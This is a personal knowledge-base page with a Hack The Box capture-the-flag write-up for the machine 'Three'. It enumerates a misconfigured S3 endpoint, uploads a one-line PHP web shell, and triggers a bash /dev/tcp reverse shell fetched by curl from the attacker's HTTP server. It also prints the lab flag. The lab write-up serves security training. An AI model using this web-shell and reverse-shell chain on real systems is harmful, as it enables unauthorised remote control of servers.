
<!doctype html>
<html lang="en" class="no-js">
  <head>
    
      <meta charset="utf-8">
      <meta name="viewport" content="width=device-width,initial-scale=1">
      
      
      
      
        <link rel="prev" href="../wpexplo/">
      
      
        <link rel="next" href="../create/">
      
      
      <link rel="icon" href="../assets/images/favicon.png">
      <meta name="generator" content="mkdocs-1.6.1, mkdocs-material-9.6.3">
    
    
      
        <title>Three - S3 Reverse Shell - My Knowledge Base</title>
      
    
    
      <link rel="stylesheet" href="../assets/stylesheets/main.d7758b05.min.css">
      
        
        <link rel="stylesheet" href="../assets/stylesheets/palette.06af60db.min.css">
      
      


    
    
      
    
    
      
        
        
        <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
        <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:300,300i,400,400i,700,700i%7CRoboto+Mono:400,400i,700,700i&display=fallback">
        <style>:root{--md-text-font:"Roboto";--md-code-font:"Roboto Mono"}</style>
      
    
    
    <script>__md_scope=new URL("..",location),__md_hash=e=>[...e].reduce(((e,_)=>(e<<5)-e+_.charCodeAt(0)),0),__md_get=(e,_=localStorage,t=__md_scope)=>JSON.parse(_.getItem(t.pathname+"."+e)),__md_set=(e,_,t=localStorage,a=__md_scope)=>{try{t.setItem(a.pathname+"."+e,JSON.stringify(_))}catch(e){}}</script>
    
      

    
    
    
  </head>
  
  
    
    
    
    
    
    <body dir="ltr" data-md-color-scheme="slate" data-md-color-primary="indigo" data-md-color-accent="indigo">
  
    
    <input class="md-toggle" data-md-toggle="drawer" type="checkbox" id="__drawer" autocomplete="off">
    <input class="md-toggle" data-md-toggle="search" type="checkbox" id="__search" autocomplete="off">
    <label class="md-overlay" for="__drawer"></label>
    <div data-md-component="skip">
      
        
        <a href="#exploiting-an-amazon-s3-bucket-for-a-reverse-shell" class="md-skip">
          Skip to content
        </a>
      
    </div>
    <div data-md-component="announce">
      
    </div>
    
    
      

  

<header class="md-header md-header--shadow" data-md-component="header">
  <nav class="md-header__inner md-grid" aria-label="Header">
    <a href=".." title="My Knowledge Base" class="md-header__button md-logo" aria-label="My Knowledge Base" data-md-component="logo">
      
  
  <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 8a3 3 0 0 0 3-3 3 3 0 0 0-3-3 3 3 0 0 0-3 3 3 3 0 0 0 3 3m0 3.54C9.64 9.35 6.5 8 3 8v11c3.5 0 6.64 1.35 9 3.54 2.36-2.19 5.5-3.54 9-3.54V8c-3.5 0-6.64 1.35-9 3.54"/></svg>

    </a>
    <label class="md-header__button md-icon" for="__drawer">
      
      <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M3 6h18v2H3zm0 5h18v2H3zm0 5h18v2H3z"/></svg>
    </label>
    <div class="md-header__title" data-md-component="header-title">
      <div class="md-header__ellipsis">
        <div class="md-header__topic">
          <span class="md-ellipsis">
            My Knowledge Base
          </span>
        </div>
        <div class="md-header__topic" data-md-component="header-topic">
          <span class="md-ellipsis">
            
              Three - S3 Reverse Shell
            
          </span>
        </div>
      </div>
    </div>
    
      
    
    
    
    
      <label class="md-header__button md-icon" for="__search">
        
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M9.5 3A6.5 6.5 0 0 1 16 9.5c0 1.61-.59 3.09-1.56 4.23l.27.27h.79l5 5-1.5 1.5-5-5v-.79l-.27-.27A6.52 6.52 0 0 1 9.5 16 6.5 6.5 0 0 1 3 9.5 6.5 6.5 0 0 1 9.5 3m0 2C7 5 5 7 5 9.5S7 14 9.5 14 14 12 14 9.5 12 5 9.5 5"/></svg>
      </label>
      <div class="md-search" data-md-component="search" role="dialog">
  <label class="md-search__overlay" for="__search"></label>
  <div class="md-search__inner" role="search">
    <form class="md-search__form" name="search">
      <input type="text" class="md-search__input" name="query" aria-label="Search" placeholder="Search" autocapitalize="off" autocorrect="off" autocomplete="off" spellcheck="false" data-md-component="search-query" required>
      <label class="md-search__icon md-icon" for="__search">
        
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M9.5 3A6.5 6.5 0 0 1 16 9.5c0 1.61-.59 3.09-1.56 4.23l.27.27h.79l5 5-1.5 1.5-5-5v-.79l-.27-.27A6.52 6.52 0 0 1 9.5 16 6.5 6.5 0 0 1 3 9.5 6.5 6.5 0 0 1 9.5 3m0 2C7 5 5 7 5 9.5S7 14 9.5 14 14 12 14 9.5 12 5 9.5 5"/></svg>
        
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M20 11v2H8l5.5 5.5-1.42 1.42L4.16 12l7.92-7.92L13.5 5.5 8 11z"/></svg>
      </label>
      <nav class="md-search__options" aria-label="Search">
        
        <button type="reset" class="md-search__icon md-icon" title="Clear" aria-label="Clear" tabindex="-1">
          
          <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M19 6.41 17.59 5 12 10.59 6.41 5 5 6.41 10.59 12 5 17.59 6.41 19 12 13.41 17.59 19 19 17.59 13.41 12z"/></svg>
        </button>
      </nav>
      
    </form>
    <div class="md-search__output">
      <div class="md-search__scrollwrap" tabindex="0" data-md-scrollfix>
        <div class="md-search-result" data-md-component="search-result">
          <div class="md-search-result__meta">
            Initializing search
          </div>
          <ol class="md-search-result__list" role="presentation"></ol>
        </div>
      </div>
    </div>
  </div>
</div>
    
    
  </nav>
  
</header>
    
    <div class="md-container" data-md-component="container">
      
      
        
          
        
      
      <main class="md-main" data-md-component="main">
        <div class="md-main__inner md-grid">
          
            
              
              <div class="md-sidebar md-sidebar--primary" data-md-component="sidebar" data-md-type="navigation" >
                <div class="md-sidebar__scrollwrap">
                  <div class="md-sidebar__inner">
                    



<nav class="md-nav md-nav--primary" aria-label="Navigation" data-md-level="0">
  <label class="md-nav__title" for="__drawer">
    <a href=".." title="My Knowledge Base" class="md-nav__button md-logo" aria-label="My Knowledge Base" data-md-component="logo">
      
  
  <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 8a3 3 0 0 0 3-3 3 3 0 0 0-3-3 3 3 0 0 0-3 3 3 3 0 0 0 3 3m0 3.54C9.64 9.35 6.5 8 3 8v11c3.5 0 6.64 1.35 9 3.54 2.36-2.19 5.5-3.54 9-3.54V8c-3.5 0-6.64 1.35-9 3.54"/></svg>

    </a>
    My Knowledge Base
  </label>
  
  <ul class="md-nav__list" data-md-scrollfix>
    
      
      
  
  
  
  
    <li class="md-nav__item">
      <a href=".." class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Home
    
  </span>
  

      </a>
    </li>
  

    
      
      
  
  
  
  
    <li class="md-nav__item">
      <a href="../bashguide/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Bash Scripting
    
  </span>
  

      </a>
    </li>
  

    
      
      
  
  
  
  
    <li class="md-nav__item">
      <a href="../bruteforce/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Bruteforce Attacks
    
  </span>
  

      </a>
    </li>
  

    
      
      
  
  
  
  
    <li class="md-nav__item">
      <a href="../burpspray/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Burpsuite - Stuffing & Spraying
    
  </span>
  

      </a>
    </li>
  

    
      
      
  
  
  
  
    <li class="md-nav__item">
      <a href="../B0x86/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Buffer Overflow x86
    
  </span>
  

      </a>
    </li>
  

    
      
      
  
  
  
  
    <li class="md-nav__item">
      <a href="../cherry/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Cherrytree
    
  </span>
  

      </a>
    </li>
  

    
      
      
  
  
  
  
    <li class="md-nav__item">
      <a href="../hmet/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Hacking Methodology
    
  </span>
  

      </a>
    </li>
  

    
      
      
  
  
  
  
    <li class="md-nav__item">
      <a href="../igtools/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Information Gathering Tools
    
  </span>
  

      </a>
    </li>
  

    
      
      
  
  
  
  
    <li class="md-nav__item">
      <a href="../linux-commands/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Linux Commands
    
  </span>
  

      </a>
    </li>
  

    
      
      
  
  
  
  
    <li class="md-nav__item">
      <a href="../linuxuserpriv/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Linux Users and Privileges
    
  </span>
  

      </a>
    </li>
  

    
      
      
  
  
  
  
    <li class="md-nav__item">
      <a href="../manuexpl/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Manual Exploitation
    
  </span>
  

      </a>
    </li>
  

    
      
      
  
  
  
  
    <li class="md-nav__item">
      <a href="../hostnamemapping/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Mapping Hostnames to IPs
    
  </span>
  

      </a>
    </li>
  

    
      
      
  
  
  
  
    <li class="md-nav__item">
      <a href="../msfc/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    MSFconsole
    
  </span>
  

      </a>
    </li>
  

    
      
      
  
  
  
  
    <li class="md-nav__item">
      <a href="../networking/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Networking
    
  </span>
  

      </a>
    </li>
  

    
      
      
  
  
  
  
    <li class="md-nav__item">
      <a href="../torproxy/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Proxychains Tor
    
  </span>
  

      </a>
    </li>
  

    
      
      
  
  
  
  
    <li class="md-nav__item">
      <a href="../pynet/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Python Networking
    
  </span>
  

      </a>
    </li>
  

    
      
      
  
  
  
  
    <li class="md-nav__item">
      <a href="../revul/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Researching Vulnerabilities
    
  </span>
  

      </a>
    </li>
  

    
      
      
  
  
  
  
    <li class="md-nav__item">
      <a href="../scanenum/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Scanning and Enumeration
    
  </span>
  

      </a>
    </li>
  

    
      
      
  
  
  
  
    <li class="md-nav__item">
      <a href="../shell/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Shell Exploitation
    
  </span>
  

      </a>
    </li>
  

    
      
      
  
  
  
  
    <li class="md-nav__item">
      <a href="../smb/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    SMB (Server Message Block)
    
  </span>
  

      </a>
    </li>
  

    
      
      
  
  
  
  
    <li class="md-nav__item">
      <a href="../ssh/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    SSH (Secure Shell)
    
  </span>
  

      </a>
    </li>
  

    
      
      
  
  
  
  
    <li class="md-nav__item">
      <a href="../wpexplo/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Wordpress exploitation
    
  </span>
  

      </a>
    </li>
  

    
      
      
  
  
    
  
  
  
    
    
    
    
    <li class="md-nav__item md-nav__item--active md-nav__item--nested">
      
        
        
        <input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_23" checked>
        
          
          <label class="md-nav__link" for="__nav_23" id="__nav_23_label" tabindex="0">
            
  
  <span class="md-ellipsis">
    HTB
    
  </span>
  

            <span class="md-nav__icon md-icon"></span>
          </label>
        
        <nav class="md-nav" data-md-level="1" aria-labelledby="__nav_23_label" aria-expanded="true">
          <label class="md-nav__title" for="__nav_23">
            <span class="md-nav__icon md-icon"></span>
            HTB
          </label>
          <ul class="md-nav__list" data-md-scrollfix>
            
              
                
  
  
    
  
  
  
    <li class="md-nav__item md-nav__item--active">
      
      <input class="md-nav__toggle md-toggle" type="checkbox" id="__toc">
      
      
        
      
      
        <label class="md-nav__link md-nav__link--active" for="__toc">
          
  
  <span class="md-ellipsis">
    Three - S3 Reverse Shell
    
  </span>
  

          <span class="md-nav__icon md-icon"></span>
        </label>
      
      <a href="./" class="md-nav__link md-nav__link--active">
        
  
  <span class="md-ellipsis">
    Three - S3 Reverse Shell
    
  </span>
  

      </a>
      
        

<nav class="md-nav md-nav--secondary" aria-label="Table of contents">
  
  
  
    
  
  
    <label class="md-nav__title" for="__toc">
      <span class="md-nav__icon md-icon"></span>
      Table of contents
    </label>
    <ul class="md-nav__list" data-md-component="toc" data-md-scrollfix>
      
        <li class="md-nav__item">
  <a href="#introduction" class="md-nav__link">
    <span class="md-ellipsis">
      Introduction
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#reconnaissance" class="md-nav__link">
    <span class="md-ellipsis">
      Reconnaissance
    </span>
  </a>
  
    <nav class="md-nav" aria-label="Reconnaissance">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#scanning-the-target-with-nmap" class="md-nav__link">
    <span class="md-ellipsis">
      Scanning the Target with Nmap
    </span>
  </a>
  
    <nav class="md-nav" aria-label="Scanning the Target with Nmap">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#key-findings" class="md-nav__link">
    <span class="md-ellipsis">
      Key Findings:
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
        
          <li class="md-nav__item">
  <a href="#virtual-host-enumeration-with-gobuster" class="md-nav__link">
    <span class="md-ellipsis">
      Virtual Host Enumeration with Gobuster
    </span>
  </a>
  
    <nav class="md-nav" aria-label="Virtual Host Enumeration with Gobuster">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#discovered-subdomains" class="md-nav__link">
    <span class="md-ellipsis">
      Discovered Subdomains:
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
        <li class="md-nav__item">
  <a href="#exploitation-aws-s3-misconfiguration" class="md-nav__link">
    <span class="md-ellipsis">
      Exploitation: AWS S3 Misconfiguration
    </span>
  </a>
  
    <nav class="md-nav" aria-label="Exploitation: AWS S3 Misconfiguration">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#configuring-aws-cli-to-interact-with-the-bucket" class="md-nav__link">
    <span class="md-ellipsis">
      Configuring AWS CLI to Interact with the Bucket
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#listing-available-buckets" class="md-nav__link">
    <span class="md-ellipsis">
      Listing Available Buckets
    </span>
  </a>
  
    <nav class="md-nav" aria-label="Listing Available Buckets">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#found-bucket" class="md-nav__link">
    <span class="md-ellipsis">
      Found Bucket:
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
        
          <li class="md-nav__item">
  <a href="#exploring-the-contents-of-the-s3-bucket" class="md-nav__link">
    <span class="md-ellipsis">
      Exploring the Contents of the S3 Bucket
    </span>
  </a>
  
    <nav class="md-nav" aria-label="Exploring the Contents of the S3 Bucket">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#retrieved-files" class="md-nav__link">
    <span class="md-ellipsis">
      Retrieved Files:
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
        
          <li class="md-nav__item">
  <a href="#uploading-a-web-shell" class="md-nav__link">
    <span class="md-ellipsis">
      Uploading a Web Shell
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
        <li class="md-nav__item">
  <a href="#gaining-a-reverse-shell" class="md-nav__link">
    <span class="md-ellipsis">
      Gaining a Reverse Shell
    </span>
  </a>
  
    <nav class="md-nav" aria-label="Gaining a Reverse Shell">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#setting-up-a-netcat-listener" class="md-nav__link">
    <span class="md-ellipsis">
      Setting Up a Netcat Listener
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#preparing-the-reverse-shell-script" class="md-nav__link">
    <span class="md-ellipsis">
      Preparing the Reverse Shell Script
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#triggering-the-reverse-shell" class="md-nav__link">
    <span class="md-ellipsis">
      Triggering the Reverse Shell
    </span>
  </a>
  
    <nav class="md-nav" aria-label="Triggering the Reverse Shell">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#listener-output" class="md-nav__link">
    <span class="md-ellipsis">
      Listener Output:
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
        
          <li class="md-nav__item">
  <a href="#confirming-access" class="md-nav__link">
    <span class="md-ellipsis">
      Confirming Access
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
        <li class="md-nav__item">
  <a href="#post-exploitation" class="md-nav__link">
    <span class="md-ellipsis">
      Post-Exploitation
    </span>
  </a>
  
    <nav class="md-nav" aria-label="Post-Exploitation">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#exploring-the-system" class="md-nav__link">
    <span class="md-ellipsis">
      Exploring the System
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#capturing-the-flag" class="md-nav__link">
    <span class="md-ellipsis">
      Capturing the Flag
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
        <li class="md-nav__item">
  <a href="#host-mapping" class="md-nav__link">
    <span class="md-ellipsis">
      Host Mapping
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#conclusion" class="md-nav__link">
    <span class="md-ellipsis">
      Conclusion
    </span>
  </a>
  
</li>
      
    </ul>
  
</nav>
      
    </li>
  

              
            
          </ul>
        </nav>
      
    </li>
  

    
      
      
  
  
  
  
    
    
    
    
    <li class="md-nav__item md-nav__item--nested">
      
        
        
        <input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_24" >
        
          
          <label class="md-nav__link" for="__nav_24" id="__nav_24_label" tabindex="0">
            
  
  <span class="md-ellipsis">
    MkDocs
    
  </span>
  

            <span class="md-nav__icon md-icon"></span>
          </label>
        
        <nav class="md-nav" data-md-level="1" aria-labelledby="__nav_24_label" aria-expanded="false">
          <label class="md-nav__title" for="__nav_24">
            <span class="md-nav__icon md-icon"></span>
            MkDocs
          </label>
          <ul class="md-nav__list" data-md-scrollfix>
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../create/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Create post
    
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../venv/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Create Virtual Enviroment
    
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../mkdocs-formatting-guide/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Formatting Guide
    
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../github/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Github create & update
    
  </span>
  

      </a>
    </li>
  

              
            
          </ul>
        </nav>
      
    </li>
  

    
  </ul>
</nav>
                  </div>
                </div>
              </div>
            
            
              
              <div class="md-sidebar md-sidebar--secondary" data-md-component="sidebar" data-md-type="toc" >
                <div class="md-sidebar__scrollwrap">
                  <div class="md-sidebar__inner">
                    

<nav class="md-nav md-nav--secondary" aria-label="Table of contents">
  
  
  
    
  
  
    <label class="md-nav__title" for="__toc">
      <span class="md-nav__icon md-icon"></span>
      Table of contents
    </label>
    <ul class="md-nav__list" data-md-component="toc" data-md-scrollfix>
      
        <li class="md-nav__item">
  <a href="#introduction" class="md-nav__link">
    <span class="md-ellipsis">
      Introduction
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#reconnaissance" class="md-nav__link">
    <span class="md-ellipsis">
      Reconnaissance
    </span>
  </a>
  
    <nav class="md-nav" aria-label="Reconnaissance">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#scanning-the-target-with-nmap" class="md-nav__link">
    <span class="md-ellipsis">
      Scanning the Target with Nmap
    </span>
  </a>
  
    <nav class="md-nav" aria-label="Scanning the Target with Nmap">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#key-findings" class="md-nav__link">
    <span class="md-ellipsis">
      Key Findings:
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
        
          <li class="md-nav__item">
  <a href="#virtual-host-enumeration-with-gobuster" class="md-nav__link">
    <span class="md-ellipsis">
      Virtual Host Enumeration with Gobuster
    </span>
  </a>
  
    <nav class="md-nav" aria-label="Virtual Host Enumeration with Gobuster">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#discovered-subdomains" class="md-nav__link">
    <span class="md-ellipsis">
      Discovered Subdomains:
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
        <li class="md-nav__item">
  <a href="#exploitation-aws-s3-misconfiguration" class="md-nav__link">
    <span class="md-ellipsis">
      Exploitation: AWS S3 Misconfiguration
    </span>
  </a>
  
    <nav class="md-nav" aria-label="Exploitation: AWS S3 Misconfiguration">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#configuring-aws-cli-to-interact-with-the-bucket" class="md-nav__link">
    <span class="md-ellipsis">
      Configuring AWS CLI to Interact with the Bucket
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#listing-available-buckets" class="md-nav__link">
    <span class="md-ellipsis">
      Listing Available Buckets
    </span>
  </a>
  
    <nav class="md-nav" aria-label="Listing Available Buckets">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#found-bucket" class="md-nav__link">
    <span class="md-ellipsis">
      Found Bucket:
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
        
          <li class="md-nav__item">
  <a href="#exploring-the-contents-of-the-s3-bucket" class="md-nav__link">
    <span class="md-ellipsis">
      Exploring the Contents of the S3 Bucket
    </span>
  </a>
  
    <nav class="md-nav" aria-label="Exploring the Contents of the S3 Bucket">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#retrieved-files" class="md-nav__link">
    <span class="md-ellipsis">
      Retrieved Files:
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
        
          <li class="md-nav__item">
  <a href="#uploading-a-web-shell" class="md-nav__link">
    <span class="md-ellipsis">
      Uploading a Web Shell
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
        <li class="md-nav__item">
  <a href="#gaining-a-reverse-shell" class="md-nav__link">
    <span class="md-ellipsis">
      Gaining a Reverse Shell
    </span>
  </a>
  
    <nav class="md-nav" aria-label="Gaining a Reverse Shell">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#setting-up-a-netcat-listener" class="md-nav__link">
    <span class="md-ellipsis">
      Setting Up a Netcat Listener
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#preparing-the-reverse-shell-script" class="md-nav__link">
    <span class="md-ellipsis">
      Preparing the Reverse Shell Script
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#triggering-the-reverse-shell" class="md-nav__link">
    <span class="md-ellipsis">
      Triggering the Reverse Shell
    </span>
  </a>
  
    <nav class="md-nav" aria-label="Triggering the Reverse Shell">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#listener-output" class="md-nav__link">
    <span class="md-ellipsis">
      Listener Output:
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
        
          <li class="md-nav__item">
  <a href="#confirming-access" class="md-nav__link">
    <span class="md-ellipsis">
      Confirming Access
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
        <li class="md-nav__item">
  <a href="#post-exploitation" class="md-nav__link">
    <span class="md-ellipsis">
      Post-Exploitation
    </span>
  </a>
  
    <nav class="md-nav" aria-label="Post-Exploitation">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#exploring-the-system" class="md-nav__link">
    <span class="md-ellipsis">
      Exploring the System
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#capturing-the-flag" class="md-nav__link">
    <span class="md-ellipsis">
      Capturing the Flag
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
        <li class="md-nav__item">
  <a href="#host-mapping" class="md-nav__link">
    <span class="md-ellipsis">
      Host Mapping
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#conclusion" class="md-nav__link">
    <span class="md-ellipsis">
      Conclusion
    </span>
  </a>
  
</li>
      
    </ul>
  
</nav>
                  </div>
                </div>
              </div>
            
          
          
            <div class="md-content" data-md-component="content">
              <article class="md-content__inner md-typeset">
                
                  



<h1 id="exploiting-an-amazon-s3-bucket-for-a-reverse-shell">Exploiting an Amazon S3 Bucket for a Reverse Shell</h1>
<h2 id="introduction">Introduction</h2>
<p>This guide covers the process of <strong>enumerating, exploiting, and gaining a reverse shell</strong> on a system using an <strong>Amazon S3 bucket</strong>. By leveraging <strong>AWS misconfigurations</strong>, we can upload a web shell and execute commands remotely to gain shell access.</p>
<h2 id="reconnaissance">Reconnaissance</h2>
<h3 id="scanning-the-target-with-nmap">Scanning the Target with Nmap</h3>
<pre><code class="language-bash">nmap -sV -A 10.129.99.11
</code></pre>
<h4 id="key-findings">Key Findings:</h4>
<ul>
<li><strong>SSH (22/tcp) running OpenSSH 7.6p1</strong></li>
<li><strong>HTTP (80/tcp) running Apache 2.4.29</strong></li>
<li>Target OS: <strong>Linux Kernel 5.X</strong></li>
</ul>
<h3 id="virtual-host-enumeration-with-gobuster">Virtual Host Enumeration with Gobuster</h3>
<pre><code class="language-bash">gobuster vhost -u http://thetoppers.htb/ -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt --append-domain
</code></pre>
<h4 id="discovered-subdomains">Discovered Subdomains:</h4>
<ul>
<li><code>s3.thetoppers.htb</code></li>
<li><code>gc._msdcs.thetoppers.htb</code></li>
</ul>
<p>Upon visiting <code>http://s3.thetoppers.htb/</code>, the response returned:</p>
<pre><code class="language-json">{&quot;status&quot;: &quot;running&quot;}
</code></pre>
<p>This suggests an <strong>Amazon S3 bucket hosting content</strong>.</p>
<hr />
<h2 id="exploitation-aws-s3-misconfiguration">Exploitation: AWS S3 Misconfiguration</h2>
<h3 id="configuring-aws-cli-to-interact-with-the-bucket">Configuring AWS CLI to Interact with the Bucket</h3>
<pre><code class="language-bash">aws configure
</code></pre>
<p>Enter temporary credentials (placeholders used):</p>
<pre><code class="language-bash">AWS Access Key ID [None]: temp
AWS Secret Access Key [None]: temp
Default region name [None]: temp
Default output format [None]: temp
</code></pre>
<h3 id="listing-available-buckets">Listing Available Buckets</h3>
<pre><code class="language-bash">aws --endpoint=http://s3.thetoppers.htb s3 ls
</code></pre>
<h4 id="found-bucket">Found Bucket:</h4>
<pre><code>2025-02-10 12:05:02 thetoppers.htb
</code></pre>
<h3 id="exploring-the-contents-of-the-s3-bucket">Exploring the Contents of the S3 Bucket</h3>
<pre><code class="language-bash">aws --endpoint=http://s3.thetoppers.htb s3 ls s3://thetoppers.htb
</code></pre>
<h4 id="retrieved-files">Retrieved Files:</h4>
<pre><code>PRE images/
2025-02-10 12:05:02  0 .htaccess
2025-02-10 12:05:02  11952 index.php
</code></pre>
<h3 id="uploading-a-web-shell">Uploading a Web Shell</h3>
<p>To execute remote commands, we create and upload a simple PHP shell:</p>
<pre><code class="language-bash">echo '&lt;?php system($_GET[&quot;cmd&quot;]); ?&gt;' &gt; shell.php
aws --endpoint=http://s3.thetoppers.htb s3 cp shell.php s3://thetoppers.htb
</code></pre>
<p>Verify the upload:</p>
<pre><code class="language-bash">aws --endpoint=http://s3.thetoppers.htb s3 ls s3://thetoppers.htb
</code></pre>
<pre><code>PRE images/
2025-02-10 12:05:02  0 .htaccess
2025-02-10 12:05:02  11952 index.php
2025-02-10 14:30:15  31 shell.php
</code></pre>
<hr />
<h2 id="gaining-a-reverse-shell">Gaining a Reverse Shell</h2>
<h3 id="setting-up-a-netcat-listener">Setting Up a Netcat Listener</h3>
<pre><code class="language-bash">nc -nvlp 1337
</code></pre>
<h3 id="preparing-the-reverse-shell-script">Preparing the Reverse Shell Script</h3>
<pre><code class="language-bash">echo &quot;#!/bin/bash\nbash -i &gt;&amp; /dev/tcp/10.10.16.29/1337 0&gt;&amp;1&quot; &gt; shell.sh
python3 -m http.server 8000
</code></pre>
<h3 id="triggering-the-reverse-shell">Triggering the Reverse Shell</h3>
<p>Accessing the uploaded PHP shell:</p>
<pre><code class="language-bash">http://thetoppers.htb/shell.php?cmd=curl%2010.10.16.29:8000/shell.sh|bash
</code></pre>
<h4 id="listener-output">Listener Output:</h4>
<pre><code>connect to [10.10.16.29] from (UNKNOWN) [10.129.99.11] 50664
bash: cannot set terminal process group (1486): Inappropriate ioctl for device
bash: no job control in this shell
</code></pre>
<h3 id="confirming-access">Confirming Access</h3>
<pre><code class="language-bash">whoami
ls -la
</code></pre>
<p>We have successfully obtained a shell with <code>www-data</code> privileges.</p>
<hr />
<h2 id="post-exploitation">Post-Exploitation</h2>
<h3 id="exploring-the-system">Exploring the System</h3>
<pre><code class="language-bash">cd /var/www/html
ls
</code></pre>
<p>Discovered files:</p>
<pre><code>images
index.php
shell.php
</code></pre>
<h3 id="capturing-the-flag">Capturing the Flag</h3>
<pre><code class="language-bash">cd /var/www/
cat flag.txt
</code></pre>
<pre><code>a980d99281a28d638ac68b9bf9453c2b
</code></pre>
<hr />
<h2 id="host-mapping">Host Mapping</h2>
<p>To ensure the target domain resolves correctly, modify <code>/etc/hosts</code>:</p>
<pre><code class="language-bash">echo &quot;10.129.99.11 s3.thetoppers.htb&quot; | sudo tee -a /etc/hosts  
echo &quot;10.129.99.11 gc._msdcs.thetoppers.htb&quot; | sudo tee -a /etc/hosts  
echo &quot;10.129.99.11 thetoppers.htb&quot; | sudo tee -a /etc/hosts  
</code></pre>
<hr />
<h2 id="conclusion">Conclusion</h2>
